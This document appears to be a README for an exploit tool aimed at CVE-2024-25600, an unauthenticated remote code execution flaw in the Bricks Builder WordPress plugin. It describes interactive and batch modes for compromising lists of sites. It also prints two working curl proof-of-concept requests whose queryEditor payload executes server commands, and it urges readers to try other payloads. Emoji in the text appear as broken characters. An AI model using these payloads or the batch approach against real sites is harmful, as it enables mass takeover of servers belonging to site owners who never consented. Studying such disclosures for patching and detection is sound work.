## https://sploitus.com/exploit?id=EAAC6501-58FD-5BF5-A3AB-B21042C9A64E
# CVE-2024-25600 Exploit Tool ๐
## Description ๐
This tool ๐ ๏ธ is designed to exploit the CVE-2024-25600 vulnerability ๐ณ๏ธ found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites ๐ป. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.
## Features ๐
- **Interactive Mode**: Engage with the target website in real-time ๐น๏ธ.
- **Batch Mode**: Scan and exploit multiple websites from a list ๐.
- **Command Execution**: Execute arbitrary commands on the target server โ๏ธ.
## Installation ๐ ๏ธ
1. Clone this repository to your local machine ๐ฅ๏ธ using `git clone`.
2. Navigate to the directory of the cloned repository.
3. Install the required Python libraries using `pip install -r requirements.txt`.
## Usage ๐
### Interactive Mode ๐ฎ
1. Run the tool with `python exploit.py -u <URL>` to start interactive mode.
2. Follow the on-screen prompts to send commands to the target server.
### Batch Mode ๐
1. Prepare a text file with a list of target URLs.
2. Run the tool with `python exploit.py -l <file_path>` to scan and exploit the listed sites.
## Proof of Concept (PoC) ๐
The base PoC provided by the disclosure is as follows:
```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
```
**Update**: Second PoC (more reliable)
```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
```
> It's possible that additional payloads could yield better results. If my exploit or proof of concept does not work for you, I encourage you to experiment with alternative payloads to find a more effective solution.
Replace `[HOST]` with the target website and `[NONCE]` with the nonce value retrieved from the site.
## Reference ๐
For more information about the CVE-2024-25600 vulnerability, please refer to the detailed disclosure at [Snicco.io](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6).
## Disclaimer โ ๏ธ
The information provided in this README is for educational purposes only. Unauthorized hacking into websites or networks is illegal and unethical. ๐ซ
## Acknowledgements ๐
Kudos to the security researchers who discovered and reported this vulnerability, providing the community with information and tools to help secure their web applications.